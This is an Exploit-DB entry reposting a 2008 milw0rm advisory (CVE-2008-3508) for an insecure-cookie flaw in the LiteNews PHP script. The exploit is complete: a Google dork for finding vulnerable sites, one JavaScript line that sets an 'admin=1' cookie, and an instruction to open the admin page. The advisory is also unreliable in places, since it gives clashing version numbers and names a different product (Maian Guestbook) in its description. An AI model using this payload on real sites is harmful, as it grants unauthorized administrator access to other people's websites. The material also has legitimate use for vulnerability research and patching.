LiteNews <= 0.1 Insecure Cookie Handling Vulnerability

2008-08-05T00:00:00
ID EDB-ID:6206
Type exploitdb
Reporter Scary-Boys
Modified 2008-08-05T00:00:00

Description

LiteNews <= 0.1 Insecure Cookie Handling Vulnerability. CVE-2008-3508. Webapps exploit for php platform

                                        
                                            #########################################################################
#                                                                       #
#         litenews-01 &lt;= 1.2 Insecure Cookie Handling Vulnerability     #
#                                                                       #
#########################################################################
#                                                                       #
# AUTHOR     : Scary-Boys						#
# HOME       : http://scary-boys.com					#
# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
#                                                                       #
#########################################################################
#                                                                       #
#     DorKs  : "Powered By litenews"         			        #
#                                                                       #
#########################################################################
#                                                                       #
#  DESCRIPTION :                                        		#
#  Maian Guestbook suffers from a insecure cookie                       #
# the admin panel only checks if the cookie exists. 		        #
#                                                                       #
#########################################################################
#                                                                       #
#  Vulnerability :                                                      #
#                                                                       #
#  javascript:document.cookie = "admin=1; path=/";                      #
#                                                                       #
#########################################################################
#                                                                       #
# after running the javascript, Go to "/admin/index.php" & Refresh      #
#                                                                       #
#########################################################################

# milw0rm.com [2008-08-05]